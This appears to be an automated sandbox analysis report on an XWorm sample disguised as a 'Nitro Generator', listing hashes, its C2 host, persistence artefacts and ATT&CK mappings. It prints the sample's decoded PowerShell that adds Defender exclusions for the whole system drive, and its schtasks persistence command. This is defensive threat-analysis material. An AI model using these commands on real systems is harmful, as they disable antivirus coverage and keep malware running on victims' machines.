Analysis
max time kernel: 146s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 21-06-2024 23:03
Static task: static1
Behavioral task: behavioral1 (sample: Nitro Generator v1.exe; resource: win7-20240220-en)
Behavioral task: behavioral2 (sample: Nitro Generator v1.exe; resource: win10-20240404-en)
Behavioral task: behavioral3 (sample: Nitro Generator v1.exe; resource: win10v2004-20240508-en)
Behavioral task: behavioral4 (sample: Nitro Generator v1.exe; resource: win11-20240508-en)
General
Target: Nitro Generator v1.exe
Size: 225KB
MD5: a2da88430b3dd46d547cd75126ecee69
SHA1: c41229461c4b6ddc695c8a01940e76a0f0b930b7
SHA256: c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12
SHA512: c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859
SSDEEP: 3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59
Malware Config
Extracted: xworm
C2: runderscore00-25851.portmap.host:25851
Install_directory: %ProgramData%
install_file: USB.exe
Signatures

Detect Xworm Payload (2 IoCs)
resource | yara_rule
C:\Windows\Nitro Generator.exe | family_xworm
behavioral4/memory/244-46-0x0000000000530000-0x000000000054A000-memory.dmp | family_xworm
Drops startup file (2 IoCs)
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | Nitro Generator.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | Nitro Generator.exe
Executes dropped EXE (4 IoCs)
pid | process
880 | NitroGen.exe
244 | Nitro Generator.exe
648 | svchost
3148 | svchost
Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | Nitro Generator.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
1 | ip-api.com
Drops file in Windows directory (1 IoCs)
description | ioc | process
File created | C:\Windows\Nitro Generator.exe | Nitro Generator v1.exe
Command and Scripting Interpreter: PowerShell
pid | process
4852 | powershell.exe
5044 | powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (5 IoCs)
pid | process
4852 | powershell.exe
4852 | powershell.exe
5044 | powershell.exe
5044 | powershell.exe
244 | Nitro Generator.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
description | pid | process
Token: SeDebugPrivilege | 4852 | powershell.exe
Token: SeDebugPrivilege | 5044 | powershell.exe
Token: SeDebugPrivilege | 244 | Nitro Generator.exe
Token: SeDebugPrivilege | 244 | Nitro Generator.exe
Token: SeDebugPrivilege | 648 | svchost
Token: SeDebugPrivilege | 3148 | svchost
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | process
244 | Nitro Generator.exe
Suspicious use of WriteProcessMemory (10 IoCs)
description | pid | process | target process
PID 2716 wrote to memory of 4852 | 2716 | Nitro Generator v1.exe | powershell.exe
PID 2716 wrote to memory of 4852 | 2716 | Nitro Generator v1.exe | powershell.exe
PID 2716 wrote to memory of 5044 | 2716 | Nitro Generator v1.exe | powershell.exe
PID 2716 wrote to memory of 5044 | 2716 | Nitro Generator v1.exe | powershell.exe
PID 2716 wrote to memory of 880 | 2716 | Nitro Generator v1.exe | NitroGen.exe
PID 2716 wrote to memory of 880 | 2716 | Nitro Generator v1.exe | NitroGen.exe
PID 2716 wrote to memory of 244 | 2716 | Nitro Generator v1.exe | Nitro Generator.exe
PID 2716 wrote to memory of 244 | 2716 | Nitro Generator v1.exe | Nitro Generator.exe
PID 244 wrote to memory of 968 | 244 | Nitro Generator.exe | schtasks.exe
PID 244 wrote to memory of 968 | 244 | Nitro Generator.exe | schtasks.exe
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe (PID 2716)
  command line: "C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4852)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
      decoded (base64 of UTF-16LE): <#jin#>Add-Type -AssemblyName System.Windows.Forms;<#faz#>[System.Windows.Forms.MessageBox]::Show('Invalid OS Type x86, ?????','','OK','Error')<#smv#>
      (shows a decoy error dialog; the <#...#> fragments are empty block comments used as padding)
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5044)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
      decoded (base64 of UTF-16LE): <#scg#>Add-MpPreference <#ezc#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zpu#> -Force <#raf#>
      (adds Microsoft Defender path exclusions for the user profile and the whole system drive; an Add-MpPreference -ExclusionPath call from a user-launched PowerShell is a high-value detection point)
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\NitroGen.exe (PID 880)
      command line: "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
      - Executes dropped EXE

    C:\Windows\Nitro Generator.exe (PID 244)
      command line: "C:\Windows\Nitro Generator.exe"
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Windows\System32\schtasks.exe (PID 968)
          command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
          - Scheduled Task/Job: Scheduled Task

C:\ProgramData\svchost (PID 648)
  command line: C:\ProgramData\svchost
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\svchost (PID 3148)
  command line: C:\ProgramData\svchost
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1): PowerShell (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Downloads